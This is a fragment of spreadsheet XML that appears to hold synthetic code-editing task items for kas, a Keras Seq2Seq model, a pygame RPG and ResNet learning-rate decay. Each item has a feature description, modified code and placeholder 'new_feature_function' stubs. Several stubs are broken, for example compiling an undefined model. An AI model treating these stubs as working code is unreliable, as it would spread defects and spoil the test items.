    <t>{'called_code_segment': 'def get_config(self, repos=None): ... return config, missing_repos', 'invoking_code_segment': 'def find_missing_repos(self, repo_paths={}): ... (self._config, missing_repo_names) = self.handler.get_config(repos=repo_paths)', 'feature_description': 'Add logging functionality to track and log configuration details when getting repositories, including repository names, paths, and configuration merge operations for better debugging and monitoring.', 'modified_complete_code': '# kas/kas/includehandler.py - Modified get_config method\n\ndef get_config(self, repos=None):\n    """\n    Parameters:\n      repos -- A dictionary that maps repo names to directory paths\n\n    Returns:\n      (config, repos)\n        config -- A dictionary containing the configuration\n        repos -- A list of missing repo names that are needed \\\n                 to create a complete configuration\n    """\n\n    repos = repos or {}\n    #New - Log repository information\n    logging.debug(\'Getting configuration with repos: %s\', list(repos.keys()))\n\n    def _internal_include_handler(filename, repo_path):\n        """\n        Recursively loads include files and finds missing repos.\n        ...\n        """\n        missing_repos = []\n        configs = []\n        try:\n            current_config, src_dir = load_config(filename)\n            #New - Log loaded configuration file\n            logging.debug(\'Loaded configuration from: %s\', filename)\n            # if lockfile exists and locking, inject it after current file\n            lockfile = self.get_lockfile(filename)\n            if self.use_lock and Path(lockfile).exists():\n                logging.debug(\'append lockfile %s\', lockfile)\n                (cfg, rep) = _internal_include_handler(lockfile,\n                                                       repo_path)\n                configs.extend(cfg)\n                missing_repos.extend(rep)\n            # src_dir must only be set by auto-generated config file\n            if src_dir:\n                self.top_repo_path = src_dir\n                repo_path = src_dir\n\n        except FileNotFoundError:\n            raise LoadConfigException(\'Configuration file not found\',\n                                      filename)\n        if not isinstance(current_config, Mapping):\n            raise IncludeException(\'Configuration file does not contain a \'\n                                   \'dictionary as base type\')\n        header = current_config.get(\'header\', {})\n\n        for include in header.get(\'includes\', []):\n            if isinstance(include, str):\n                includefile = \'\'\n                if include.startswith(os.path.pathsep):\n                    includefile = include\n                else:\n                    includefile = os.path.abspath(\n                        os.path.join(repo_path, include))\n                    if not os.path.exists(includefile):\n                        alternate = os.path.abspath(\n                            os.path.join(os.path.dirname(filename),\n                                         include))\n                        if os.path.exists(alternate):\n                            logging.warning(\n                                \'Falling back to file-relative addressing \'\n                                \'of local include "%s"\', include)\n                            logging.warning(\n                                \'Update your layer to repo-relative \'\n                                \'addressing to avoid this warning\')\n                            includefile = alternate\n                (cfg, rep) = _internal_include_handler(includefile,\n                                                       repo_path)\n                configs.extend(cfg)\n                missing_repos.extend(rep)\n            elif isinstance(include, Mapping):\n                includerepo = include.get(\'repo\', None)\n                includedir = repos.get(includerepo, None)\n                if includedir is not None:\n                    try:\n                        includefile = include[\'file\']\n                    except KeyError:\n                        raise IncludeException(\n                            f\'"file" is not specified: {include}\')\n                    abs_includedir = os.path.abspath(includedir)\n                    #New - Log repository-based include\n                    logging.debug(\'Including file from repo %s: %s\', includerepo, includefile)\n                    (cfg, rep) = _internal_include_handler(\n                        os.path.join(abs_includedir, includefile),\n                        abs_includedir)\n                    configs.extend(cfg)\n                    missing_repos.extend(rep)\n                else:\n                    #New - Log missing repository\n                    logging.debug(\'Repository %s not found in provided repos\', includerepo)\n                    missing_repos.append(includerepo)\n        configs.append((filename, current_config))\n        # Remove all possible duplicates in missing_repos\n        missing_repos = list(OrderedDict.fromkeys(missing_repos))\n        return (configs, missing_repos)\n\n    def _internal_dict_merge(dest, upd, recursive_merge=True):\n        """\n        Merges upd recursively into a copy of dest as OrderedDict\n        ...\n        """\n        if (not isinstance(dest, Mapping)) \\\n                or (not isinstance(upd, Mapping)):\n            raise IncludeException(\'Cannot merge using non-dict\')\n        dest = OrderedDict(dest)\n        updkeys = list(upd.keys())\n        if not set(list(dest.keys())) &amp; set(updkeys):\n            recursive_merge = False\n        if recursive_merge:\n            for key in updkeys:\n                val = upd[key]\n                try:\n                    dest_subkey = dest.get(key, None)\n                except AttributeError:\n                    dest_subkey = None\n                if isinstance(dest_subkey, Mapping) \\\n                        and isinstance(val, Mapping):\n                    ret = _internal_dict_merge(dest_subkey, val)\n                    dest[key] = ret\n                else:\n                    dest[key] = upd[key]\n            return dest\n        try:\n            for k in upd:\n                dest[k] = upd[k]\n        except AttributeError:\n            # this mapping is not a dict\n            for k in upd:\n                dest[k] = upd[k]\n        return dest\n\n    configs = []\n    missing_repos = []\n    for configfile in self.top_files:\n        cfgs, reps = _internal_include_handler(configfile,\n                                               self.top_repo_path)\n        configs.extend(cfgs)\n        for repo in reps:\n            if repo not in missing_repos:\n                missing_repos.append(repo)\n\n    #New - Log final configuration merge\n    logging.debug(\'Merging %d configuration files\', len(configs))\n    config = functools.reduce(_internal_dict_merge,\n                              map(lambda x: x[1], configs))\n    #New - Log missing repositories if any\n    if missing_repos:\n        logging.debug(\'Missing repositories: %s\', missing_repos)\n    logging.debug(\'Configuration retrieval completed successfully\')\n    return config, missing_repos\n\n# kas/kas/config.py - Modified find_missing_repos method\n\ndef find_missing_repos(self, repo_paths={}):\n    """\n        Returns repos that are in config but not on disk\n    """\n    #Modify - Add logging before getting config\n    logging.debug(\'Finding missing repositories with provided paths: %s\', list(repo_paths.keys()))\n    (self._config, missing_repo_names) = \\\n        self.handler.get_config(repos=repo_paths)\n    #New - Log the result\n    if missing_repo_names:\n        logging.warning(\'Missing repositories found: %s\', missing_repo_names)\n    else:\n        logging.debug(\'All required repositories are available\')\n    return missing_repo_names'}</t>
  </si>
  <si>
    <t>{'file_1': 'class Config:\n    #Modify\n    def get_config(self):\n        return self._config', 'file_2': 'class Config:\n    #Modify\n    def get_repos(self):\n        self.repo_dict = self._get_repo_dict()\n        #New\n        new_feature_function(self.get_config())\n        return list(self.repo_dict.values())', 'file_3': "class Config:\n    #Modify\n    def get_bitbake_targets(self):\n        if self._override_target:\n            return self._override_target\n        environ_targets = [i for i in os.environ.get('KAS_TARGET', '').split() if i]\n        if environ_targets:\n            return environ_targets\n        target = self._config.get('target', 'core-image-minimal')\n        if isinstance(target, str):\n            return [target]\n        return target", 'file_4': "#New\n\ndef new_feature_function(config):\n    # New feature implementation\n    print('New feature invoked with config:', config)"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def Seq2Seq(output_dim, output_length, batch_input_shape=None, input_shape=None, batch_size=None, input_dim=None, input_length=None, hidden_dim=None, depth=1, broadcast_state=True, unroll=False, stateful=False, inner_broadcast_state=True, teacher_force=False, peek=False, dropout=0.)', 'invoking_code_segment': "def test_Seq2Seq(): x = np.random.random((samples, input_length, input_dim)); y = np.random.random((samples, output_length, output_dim)); models = []; models += [Seq2Seq(output_dim=output_dim, hidden_dim=hidden_dim, output_length=output_length, input_shape=(input_length, input_dim))]; model.compile(loss='mse', optimizer='sgd'); model.fit(x, y, epochs=1)", 'feature_description': 'Add support for custom loss function and optimizer parameters to the Seq2Seq model, allowing users to specify custom loss functions and optimizers when creating the model instead of only during compilation.', 'modified_complete_code': "# File 1: seq2seq/seq2seq/models.py\nfrom __future__ import absolute_import\nfrom recurrentshop import LSTMCell, RecurrentSequential\nfrom .cells import LSTMDecoderCell, AttentionDecoderCell\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, Dropout, TimeDistributed, Bidirectional, Input\nfrom keras.optimizers import SGD  #New\nfrom keras.losses import mean_squared_error  #New\n\n# ... SimpleSeq2Seq function remains unchanged ...\n\ndef Seq2Seq(output_dim, output_length, batch_input_shape=None,\n            input_shape=None, batch_size=None, input_dim=None, input_length=None,\n            hidden_dim=None, depth=1, broadcast_state=True, unroll=False,\n            stateful=False, inner_broadcast_state=True, teacher_force=False,\n            peek=False, dropout=0., custom_loss=None, custom_optimizer=None):  #Modify: added custom_loss and custom_optimizer parameters\n\n    '''Seq2seq model with support for custom loss and optimizer'''\n\n    if isinstance(depth, int):\n        depth = (depth, depth)\n    if batch_input_shape:\n        shape = batch_input_shape\n    elif input_shape:\n        shape = (batch_size,) + input_shape\n    elif input_dim:\n        if input_length:\n            shape = (batch_size,) + (input_length,) + (input_dim,)\n        else:\n            shape = (batch_size,) + (None,) + (input_dim,)\n    else:\n        raise TypeError\n    if hidden_dim is None:\n        hidden_dim = output_dim\n\n    encoder = RecurrentSequential(readout=True, state_sync=inner_broadcast_state,\n                                  unroll=unroll, stateful=stateful,\n                                  return_states=broadcast_state)\n    for _ in range(depth[0]):\n        encoder.add(LSTMCell(hidden_dim, batch_input_shape=(shape[0], hidden_dim)))\n        encoder.add(Dropout(dropout))\n\n    dense1 = TimeDistributed(Dense(hidden_dim))\n    dense1.supports_masking = True\n    dense2 = Dense(output_dim)\n\n    decoder = RecurrentSequential(readout='add' if peek else 'readout_only',\n                                  state_sync=inner_broadcast_state, decode=True,\n                                  output_length=output_length, unroll=unroll,\n                                  stateful=stateful, teacher_force=teacher_force)\n\n    for _ in range(depth[1]):\n        decoder.add(Dropout(dropout, batch_input_shape=(shape[0], output_dim)))\n        decoder.add(LSTMDecoderCell(output_dim=output_dim, hidden_dim=hidden_dim,\n                                    batch_input_shape=(shape[0], output_dim)))\n\n    _input = Input(batch_shape=shape)\n    _input._keras_history[0].supports_masking = True\n    encoded_seq = dense1(_input)\n    encoded_seq = encoder(encoded_seq)\n    if broadcast_state:\n        assert type(encoded_seq) is list\n        states = encoded_seq[-2:]\n        encoded_seq = encoded_seq[0]\n    else:\n        states = None\n    encoded_seq = dense2(encoded_seq)\n    inputs = [_input]\n    if teacher_force:\n        truth_tensor = Input(batch_shape=(shape[0], output_length, output_dim))\n        truth_tensor._keras_history[0].supports_masking = True\n        inputs += [truth_tensor]\n\n    decoded_seq = decoder(encoded_seq,\n                          ground_truth=inputs[1] if teacher_force else None,\n                          initial_readout=encoded_seq, initial_state=states)\n    \n    model = Model(inputs, decoded_seq)\n    model.encoder = encoder\n    model.decoder = decoder\n    \n    #New: Store custom loss and optimizer in model for later use\n    model.custom_loss = custom_loss\n    model.custom_optimizer = custom_optimizer\n    \n    return model\n\n# ... AttentionSeq2Seq function remains unchanged ...\n\n# File 2: seq2seq/tests/test.py\nfrom seq2seq import SimpleSeq2Seq, Seq2Seq, AttentionSeq2Seq\nimport numpy as np\nfrom keras.utils.test_utils import keras_test\nfrom keras.optimizers import Adam, RMSprop  #New\nfrom keras.losses import mean_squared_error, mean_absolute_error  #New\n\ninput_length = 5\ninput_dim = 3\noutput_length = 3\noutput_dim = 4\nsamples = 100\nhidden_dim = 24\n\n@keras_test\ndef test_Seq2Seq():\n    x = np.random.random((samples, input_length, input_dim))\n    y = np.random.random((samples, output_length, output_dim))\n\n    models = []\n    models += [Seq2Seq(output_dim=output_dim, hidden_dim=hidden_dim, output_length=output_length, input_shape=(input_length, input_dim))]\n    models += [Seq2Seq(output_dim=output_dim, hidden_dim=hidden_dim, output_length=output_length, input_shape=(input_length, input_dim), peek=True)]\n    models += [Seq2Seq(output_dim=output_dim, hidden_dim=hidden_dim, output_length=output_length, input_shape=(input_length, input_dim), depth=2)]\n    models += [Seq2Seq(output_dim=output_dim, hidden_dim=hidden_dim, output_length=output_length, input_shape=(input_length, input_dim), peek=True, depth=2)]\n    #New: Add model with custom loss and optimizer\n    models += [Seq2Seq(output_dim=output_dim, hidden_dim=hidden_dim, output_length=output_length, input_shape=(input_length, input_dim), custom_loss=mean_absolute_error, custom_optimizer=Adam(lr=0.001))]\n\n    for model in models:\n        #Modify: Use custom loss and optimizer if provided\n        loss_fn = model.custom_loss if model.custom_loss else 'mse'\n        optimizer = model.custom_optimizer if model.custom_optimizer else 'sgd'\n        model.compile(loss=loss_fn, optimizer=optimizer)\n        model.fit(x, y, epochs=1)\n\n    model = Seq2Seq(output_dim=output_dim, hidden_dim=hidden_dim, output_length=output_length, input_shape=(input_length, input_dim), peek=True, depth=2, teacher_force=True, custom_loss=mean_squared_error, custom_optimizer=RMSprop(lr=0.001))  #Modify: added custom loss and optimizer\n    loss_fn = model.custom_loss if model.custom_loss else 'mse'  #New\n    optimizer = model.custom_optimizer if model.custom_optimizer else 'sgd'  #New\n    model.compile(loss=loss_fn, optimizer=optimizer)  #Modify: use custom loss and optimizer\n    model.fit([x, y], y, epochs=1)"}</t>
  </si>
  <si>
    <t>{'file_1': "def Seq2Seq(output_dim, output_length, batch_input_shape=None, input_shape=None, batch_size=None, input_dim=None, input_length=None, hidden_dim=None, depth=1, broadcast_state=True, unroll=False, stateful=False, inner_broadcast_state=True, teacher_force=False, peek=False, dropout=0., custom_loss=None, custom_optimizer=None):\n    # Implementation details...\n    if custom_loss:\n        model.compile(loss=custom_loss, optimizer=custom_optimizer() if custom_optimizer else 'sgd')\n    else:\n        model.compile(loss='mse', optimizer='sgd')\n    return model", 'file_2': 'models += [Seq2Seq(output_dim=output_dim, hidden_dim=hidden_dim, output_length=output_length, input_shape=(input_length, input_dim), custom_loss=custom_loss, custom_optimizer=custom_optimizer)]\nmodels += [Seq2Seq(output_dim=output_dim, hidden_dim=hidden_dim, output_length=output_length, input_shape=(input_length, input_dim), peek=True, custom_loss=custom_loss, custom_optimizer=custom_optimizer)]\nmodels += [Seq2Seq(output_dim=output_dim, hidden_dim=hidden_dim, output_length=output_length, input_shape=(input_length, input_dim), depth=2, custom_loss=custom_loss, custom_optimizer=custom_optimizer)]\nmodels += [Seq2Seq(output_dim=output_dim, hidden_dim=hidden_dim, output_length=output_length, input_shape=(input_length, input_dim), peek=True, depth=2, custom_loss=custom_loss, custom_optimizer=custom_optimizer)]', 'file_3': "def test_Seq2Seq():\n    x = np.random.random((samples, input_length, input_dim))\n    y = np.random.random((samples, output_length, output_dim))\n    models = []\n    models += [Seq2Seq(output_dim=output_dim, hidden_dim=hidden_dim, output_length=output_length, input_shape=(input_length, input_dim), custom_loss=custom_loss, custom_optimizer=custom_optimizer)]\n    models += [Seq2Seq(output_dim=output_dim, hidden_dim=hidden_dim, output_length=output_length, input_shape=(input_length, input_dim), peek=True, custom_loss=custom_loss, custom_optimizer=custom_optimizer)]\n    models += [Seq2Seq(output_dim=output_dim, hidden_dim=hidden_dim, output_length=output_length, input_shape=(input_length, input_dim), depth=2, custom_loss=custom_loss, custom_optimizer=custom_optimizer)]\n    models += [Seq2Seq(output_dim=output_dim, hidden_dim=hidden_dim, output_length=output_length, input_shape=(input_length, input_dim), peek=True, depth=2, custom_loss=custom_loss, custom_optimizer=custom_optimizer)]\n    for model in models:\n        model.compile(loss='mse', optimizer='sgd')\n        model.fit(x, y, epochs=1)\n    model = Seq2Seq(output_dim=output_dim, hidden_dim=hidden_dim, output_length=output_length, input_shape=(input_length, input_dim), peek=True, depth=2, teacher_force=True, custom_loss=custom_loss, custom_optimizer=custom_optimizer)\n    model.compile(loss='mse', optimizer='sgd')\n    model.fit([x, y], y, epochs=1)", 'file_4': 'def custom_loss(y_true, y_pred):\n    return K.mean(K.square(y_pred - y_true), axis=-1)\n\ndef custom_optimizer():\n    return Adam(lr=0.001)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'LevelState.make_sprites() method and assign_dialogue() method in levels.py - these methods create sprites and assign dialogue to NPCs', 'invoking_code_segment': 'main() function in main.py that instantiates LevelState objects and passes them to the state_dict, which are then used by the Control class to manage game states', 'feature_description': 'Add a new dynamic NPC interaction system that allows players to interact with NPCs through a dialogue tree system with branching conversations, NPC memory of previous interactions, and dynamic dialogue changes based on game state. This includes adding an InteractionManager class to handle NPC interactions, expanding the dialogue system to support branching conversations, and adding NPC state tracking for more immersive gameplay.', 'modified_complete_code': '# File 1: The-Stolen-Crown-RPG/data/states/levels.py\n# Add new import at top\nfrom .. components import interaction_manager\n\n# Modify the LevelState.__init__ method\ndef __init__(self, name, battles=False):\n    super(LevelState, self).__init__()\n    self.name = name\n    self.tmx_map = setup.TMX[name]\n    self.allow_battles = battles\n    self.music_title = None\n    self.previous_music = None\n    self.music = None\n    self.volume = None\n    self.portal = None\n    #New - Add interaction manager for dynamic NPC interactions\n    self.interaction_manager = None\n\n# Modify the startup method to initialize interaction manager\ndef startup(self, current_time, game_data):\n    """Call when the State object is flipped to."""\n    self.game_data = game_data\n    self.music, self.volume = self.set_music()\n    self.current_time = current_time\n    self.state = \'transition_in\'\n    self.reset_dialogue = ()\n    self.switch_to_battle = False\n    self.use_portal = False\n    self.allow_input = False\n    self.cut_off_bottom_map = [\'castle\', \'town\', \'dungeon\']\n    self.renderer = tilerender.Renderer(self.tmx_map)\n    self.map_image = self.renderer.make_2x_map()\n    self.viewport = self.make_viewport(self.map_image)\n    self.level_surface = self.make_level_surface(self.map_image)\n    self.level_rect = self.level_surface.get_rect()\n    self.portals = self.make_level_portals()\n    self.player = self.make_player()\n    self.blockers = self.make_blockers()\n    self.sprites = self.make_sprites()\n    self.collision_handler = collision.CollisionHandler(self.player, self.blockers, self.sprites, self.portals, self)\n    self.dialogue_handler = textbox.TextHandler(self)\n    #New - Initialize interaction manager with sprites and game data\n    self.interaction_manager = interaction_manager.InteractionManager(self.sprites, self.game_data)\n    self.state_dict = self.make_state_dict()\n    self.menu_screen = player_menu.Player_Menu(game_data, self)\n    self.transition_rect = setup.SCREEN.get_rect()\n    self.transition_alpha = 255\n\n# Modify assign_dialogue method to use interaction manager\ndef assign_dialogue(self, sprite, property_dict):\n    """Assign dialogue from object property dictionaries in tmx maps to sprites."""\n    dialogue_list = []\n    for i in range(int(property_dict[\'dialogue length\'])):\n        dialogue_list.append(property_dict[\'dialogue\'+str(i)])\n        sprite.dialogue = dialogue_list\n    \n    #Modify - Store original dialogue for interaction manager\n    sprite.original_dialogue = dialogue_list.copy()\n    \n    if sprite.name == \'oldman\':\n        quest_in_process_dialogue = [\'Hurry to the NorthEast Shores!\', \'I do not have much time left.\']\n        if self.game_data[\'has brother elixir\']:\n            if self.game_data[\'elixir received\']:\n                sprite.dialogue = [\'My good health is thanks to you.\', \'I will be forever in your debt.\']\n            else:\n                sprite.dialogue = [\'Thank you for reaching my brother.\', \'This ELIXIR will cure my ailment.\', \'As a reward, I will teach you a magic spell.\', \'Use it wisely.\', \'You learned FIRE BLAST.\']\n        elif self.game_data[\'talked to sick brother\']:\n            sprite.dialogue = quest_in_process_dialogue\n        elif not self.game_data[\'talked to sick brother\']:\n            self.reset_dialogue = (sprite, quest_in_process_dialogue)\n    elif sprite.name == \'oldmanbrother\':\n        if self.game_data[\'has brother elixir\']:\n            if self.game_data[\'elixir received\']:\n                sprite.dialogue = [\'I am glad my brother is doing well.\', \'You have a wise and generous spirit.\']\n            else:\n                sprite.dialogue = [\'Hurry! There is precious little time.\']\n        elif self.game_data[\'talked to sick brother\']:\n            sprite.dialogue = [\'My brother is sick?!?\', \'I have not seen him in years. I had no idea he was not well.\', \'Quick, take this ELIXIR to him immediately.\']\n    elif sprite.name == \'king\':\n        retrieved_crown_dialogue = [\'My crown! You recovered my stolen crown!!!\', \'I can not believe what I see before my eyes.\', \'You are truly a brave and noble warrior.\', \'Henceforth, I name thee Grand Protector of this Town!\', \'You are the greatest warrior this world has ever known.\']\n        thank_you_dialogue = [\'Thank you for retrieving my crown.\', \'My kingdom is forever in your debt.\']\n        if self.game_data[\'crown quest\'] and not self.game_data[\'delivered crown\']:\n            sprite.dialogue = retrieved_crown_dialogue\n            self.reset_dialogue = (sprite, thank_you_dialogue)\n        elif self.game_data[\'delivered crown\']:\n            sprite.dialogue = thank_you_dialogue\n    \n    #New - Store interaction count for each NPC\n    if not hasattr(sprite, \'interaction_count\'):\n        sprite.interaction_count = 0\n\n# Modify running_normally to update interaction manager\ndef running_normally(self, surface, keys, current_time):\n    """Update level normally."""\n    self.check_for_dialogue()\n    self.player.update(keys, current_time)\n    self.sprites.update(current_time)\n    self.collision_handler.update(keys, current_time)\n    #New - Update interaction manager for dynamic NPC behavior\n    if self.interaction_manager:\n        self.interaction_manager.update(current_time)\n    self.check_for_battle()\n    self.check_for_portals()\n    self.check_for_end_of_game()\n    self.dialogue_handler.update(keys, current_time)\n    self.check_for_menu(keys)\n    self.viewport_update()\n    self.draw_level(surface)\n\n# New method to handle NPC interactions\ndef handle_npc_interaction(self, npc_sprite):\n    """Handle interaction with an NPC through the interaction manager."""\n    if self.interaction_manager:\n        self.interaction_manager.interact_with_npc(npc_sprite, self.player)\n        npc_sprite.interaction_count += 1\n\n---\n\n# File 2: The-Stolen-Crown-RPG/data/main.py\n# Modify main() function to pass interaction capability\ndef main():\n    """Add states to control here"""\n    run_it = tools.Control(setup.ORIGINAL_CAPTION)\n    state_dict = {MAIN_MENU: main_menu.Menu(),\n                  TOWN: levels.LevelState(TOWN),\n                  CASTLE: levels.LevelState(CASTLE),\n                  HOUSE: levels.LevelState(HOUSE),\n                  OVERWORLD: levels.LevelState(OVERWORLD, True),\n                  BROTHER_HOUSE: levels.LevelState(BROTHER_HOUSE),\n                  INN: shop.Inn(),\n                  ARMOR_SHOP: shop.ArmorShop(),\n                  WEAPON_SHOP: shop.WeaponShop(),\n                  MAGIC_SHOP: shop.MagicShop(),\n                  POTION_SHOP: shop.PotionShop(),\n                  BATTLE: battle.Battle(),\n                  DUNGEON: levels.LevelState(DUNGEON, True),\n                  DUNGEON2: levels.LevelState(DUNGEON2, True),\n                  DUNGEON3: levels.LevelState(DUNGEON3, True),\n                  DUNGEON4: levels.LevelState(DUNGEON4, True),\n                  DUNGEON5: levels.LevelState(DUNGEON5, True),\n                  INSTRUCTIONS: main_menu.Instructions(),\n                  LOADGAME: main_menu.LoadGame(),\n                  DEATH_SCENE: death.DeathScene(),\n                  CREDITS: credits.Credits()\n                  }\n    #Modify - Setup states with enhanced NPC interaction support\n    run_it.setup_states(state_dict, c.MAIN_MENU)\n    run_it.main()\n\n---\n\n# New File: The-Stolen-Crown-RPG/data/components/interaction_manager.py\n# New - Complete interaction manager implementation\nimport pygame as pg\n\nclass InteractionManager:\n    """Manages dynamic NPC interactions and dialogue trees."""\n    \n    def __init__(self, sprites, game_data):\n        self.sprites = sprites\n        self.game_data = game_data\n        self.npc_states = {}\n        self.dialogue_trees = {}\n        self.initialize_npc_states()\n    \n    def initialize_npc_states(self):\n        """Initialize state tracking for all NPCs."""\n        for sprite in self.sprites:\n            if hasattr(sprite, \'name\'):\n                self.npc_states[sprite.name] = {\n                    \'interaction_count\': 0,\n                    \'last_interaction_time\': 0,\n                    \'dialogue_index\': 0,\n                    \'has_interacted\': False\n                }\n    \n    def interact_with_npc(self, npc, player):\n        """Handle interaction between player and NPC."""\n        if npc.name in self.npc_states:\n            state = self.npc_states[npc.name]\n            state[\'interaction_count\'] += 1\n            state[\'has_interacted\'] = True\n            self.update_npc_dialogue(npc, state)\n    \n    def update_npc_dialogue(self, npc, state):\n        """Update NPC dialogue based on interaction history."""\n        interaction_count = state[\'interaction_count\']\n        if interaction_count &gt; 3 and hasattr(npc, \'original_dialogue\'):\n            if npc.name == \'oldman\':\n                npc.dialogue = [\'We meet again, brave warrior!\', \'Your deeds are legendary.\']\n            elif npc.name == \'king\':\n                npc.dialogue = [\'Greetings, my noble protector!\', \'Your service is invaluable.\']\n    \n    def update(self, current_time):\n        """Update interaction manager state."""\n        for npc_name, state in self.npc_states.items():\n            state[\'last_interaction_time\'] = current_time\n    \n    def get_npc_state(self, npc_name):\n        """Get the current state of an NPC."""\n        return self.npc_states.get(npc_name, None)\n    \n    def reset_npc_interaction(self, npc_name):\n        """Reset interaction state for an NPC."""\n        if npc_name in self.npc_states:\n            self.npc_states[npc_name][\'interaction_count\'] = 0\n            self.npc_states[npc_name][\'has_interacted\'] = False'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def update(self, surface, keys, current_time):\n    """\n    Update state.\n    """\n    state_function = self.state_dict[self.state]\n    state_function(surface, keys, current_time)\n    #Modify\n    if self.state == \'dialogue\':\n        self.new_feature_function(surface, keys, current_time)', '#file 2': 'def main(self):\n    """\n    Main loop for entire program.\n    """\n    while not self.done:\n        self.event_loop()\n        self.update(self.screen, self.keys, self.current_time)\n        pg.display.update()\n    #Modify\n    if self.state == \'dialogue\':\n        self.new_feature_function(self.screen, self.keys, self.current_time)', '#file 3': 'def event_loop(self):\n    """\n    Process all events and pass them down to current state.\n    """\n    self.keys = pg.key.get_pressed()\n    for event in pg.event.get():\n        if event.type == pg.QUIT:\n            self.done = True\n        elif event.type == pg.KEYDOWN:\n            self.keys = pg.key.get_pressed()\n        elif event.type == pg.KEYUP:\n            self.keys = pg.key.get_pressed()\n        self.state.get_event(event)\n    #Modify\n    if self.state == \'dialogue\':\n        self.new_feature_function(self.screen, self.keys, self.current_time)', '#file 4': 'def new_feature_function(self, surface, keys, current_time):\n    """\n    New feature function to be invoked.\n    """\n    # New feature implementation\n    pass\n    #New\n    if keys[pg.K_SPACE]:\n        self.dialogue_choice = \'question1\'\n    elif keys[pg.K_RETURN]:\n        self.dialogue_choice = \'question2\'\n    self.dialogue_system(surface, self.dialogue_choice)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def learning_rate_with_decay(batch_size, batch_denom, num_images, boundary_epochs, decay_rates, base_lr=0.01, warmup=False):', 'invoking_code_segment': "learning_rate_fn = resnet_run_loop.learning_rate_with_decay(batch_size=params['batch_size'], batch_denom=256, num_images=_NUM_IMAGES['train'], boundary_epochs=[30, 60, 80, 90], decay_rates=[1, 0.1, 0.01, 0.001, 1e-4], warmup=warmup, base_lr=base_lr)", 'feature_description': "Add a new feature to the model that adjusts the learning rate based on the model's performance during training. This feature introduces a performance-based learning rate adjustment mechanism that monitors validation accuracy and dynamically adjusts the learning rate accordingly. When validation accuracy plateaus or decreases, the learning rate is reduced to help the model escape local minima and improve convergence.", 'modified_complete_code': '# In resnet_run_loop.py\n\n#Modify\ndef learning_rate_with_decay(\n    batch_size, batch_denom, num_images, boundary_epochs, decay_rates,\n    base_lr=0.01, warmup=False, performance_based_adjustment=False, \n    performance_threshold=0.001, min_lr=1e-6):\n  """Get a learning rate that decays step-wise as training progresses.\n\n  Args:\n    batch_size: the number of examples processed in each training batch.\n    batch_denom: this value will be used to scale the base learning rate.\n      `0.1 * batch size` is divided by this number, such that when\n      batch_denom == batch_size, the initial learning rate will be 0.1.\n    num_images: total number of images that will be used for training.\n    boundary_epochs: list of ints representing the epochs at which we\n      decay the learning rate.\n    decay_rates: list of floats representing the decay rates to be used\n      for scaling the learning rate. It should have one more element\n      than `boundary_epochs`, and all elements should have the same type.\n    base_lr: Initial learning rate scaled based on batch_denom.\n    warmup: Run a 5 epoch warmup to the initial lr.\n    #New\n    performance_based_adjustment: If True, enable performance-based learning rate adjustment.\n    performance_threshold: Minimum improvement in validation accuracy to maintain current learning rate.\n    min_lr: Minimum learning rate threshold to prevent it from becoming too small.\n  Returns:\n    Returns a function that takes a single argument - the number of batches\n    trained so far (global_step)- and returns the learning rate to be used\n    for training the next batch.\n  """\n  initial_learning_rate = base_lr * batch_size / batch_denom\n  batches_per_epoch = num_images / batch_size\n\n  boundaries = [int(batches_per_epoch * epoch) for epoch in boundary_epochs]\n  vals = [initial_learning_rate * decay for decay in decay_rates]\n\n  #New\n  # Performance tracking variables\n  performance_state = {\n      \'best_accuracy\': 0.0,\n      \'current_lr_multiplier\': 1.0,\n      \'steps_without_improvement\': 0,\n      \'performance_adjustment_enabled\': performance_based_adjustment\n  }\n\n  def learning_rate_fn(global_step, current_accuracy=None):\n    """Builds scaled learning rate function with 5 epoch warm up and performance-based adjustment."""\n    lr = tf.train.piecewise_constant(global_step, boundaries, vals)\n    \n    #New\n    # Apply performance-based adjustment if enabled and accuracy is provided\n    if performance_state[\'performance_adjustment_enabled\'] and current_accuracy is not None:\n      # Check if accuracy has improved\n      if current_accuracy &gt; performance_state[\'best_accuracy\'] + performance_threshold:\n        performance_state[\'best_accuracy\'] = current_accuracy\n        performance_state[\'steps_without_improvement\'] = 0\n      else:\n        performance_state[\'steps_without_improvement\'] += 1\n        # Reduce learning rate if no improvement for several steps\n        if performance_state[\'steps_without_improvement\'] &gt; 3:\n          performance_state[\'current_lr_multiplier\'] *= 0.95\n          performance_state[\'steps_without_improvement\'] = 0\n      \n      # Apply multiplier and ensure minimum learning rate\n      lr = tf.maximum(lr * performance_state[\'current_lr_multiplier\'], min_lr)\n    \n    if warmup:\n      warmup_steps = int(batches_per_epoch * 5)\n      warmup_lr = (initial_learning_rate * tf.cast(global_step, tf.float32) / tf.cast(warmup_steps, tf.float32))\n      return tf.cond(global_step &lt; warmup_steps, lambda: warmup_lr, lambda: lr)\n    return lr\n\n  #New\n  # Return function with performance state attached\n  learning_rate_fn.performance_state = performance_state\n  return learning_rate_fn\n\n# In nsfw_main_finetune.py\n\n#Modify\ndef nsfw_model_fn(features, labels, mode, params):\n  """Model function for CIFAR-10."""\n  features = tf.reshape(features, [-1, _IMAGE_SIZE, _IMAGE_SIZE, _NUM_CHANNELS])\n\n  if params[\'fine_tune\']:\n    warmup = False\n    base_lr = .1\n  else:\n    warmup = True\n    base_lr = .128\n\n  #Modify\n  learning_rate_fn = resnet_run_loop.learning_rate_with_decay(\n      batch_size=params[\'batch_size\'],\n      batch_denom=256,\n      num_images=_NUM_IMAGES[\'train\'],\n      boundary_epochs=[30, 60, 80, 90],\n      decay_rates=[1, 0.1, 0.01, 0.001, 1e-4],\n      warmup=warmup,\n      base_lr=base_lr,\n      #New\n      performance_based_adjustment=True,\n      performance_threshold=0.001,\n      min_lr=1e-6)\n\n  weight_decay = 2e-4\n\n  def loss_filter_fn(_):\n    return True\n\n  return resnet_run_loop.resnet_model_fn(\n      features=features,\n      labels=labels,\n      mode=mode,\n      model_class=Model,\n      resnet_size=params[\'resnet_size\'],\n      weight_decay=weight_decay,\n      learning_rate_fn=learning_rate_fn,\n      momentum=0.9,\n      data_format=params[\'data_format\'],\n      resnet_version=params[\'resnet_version\'],\n      loss_scale=params[\'loss_scale\'],\n      loss_filter_fn=loss_filter_fn,\n      dtype=params[\'dtype\'],\n      fine_tune=params[\'fine_tune\']\n  )'}</t>
  </si>
  <si>
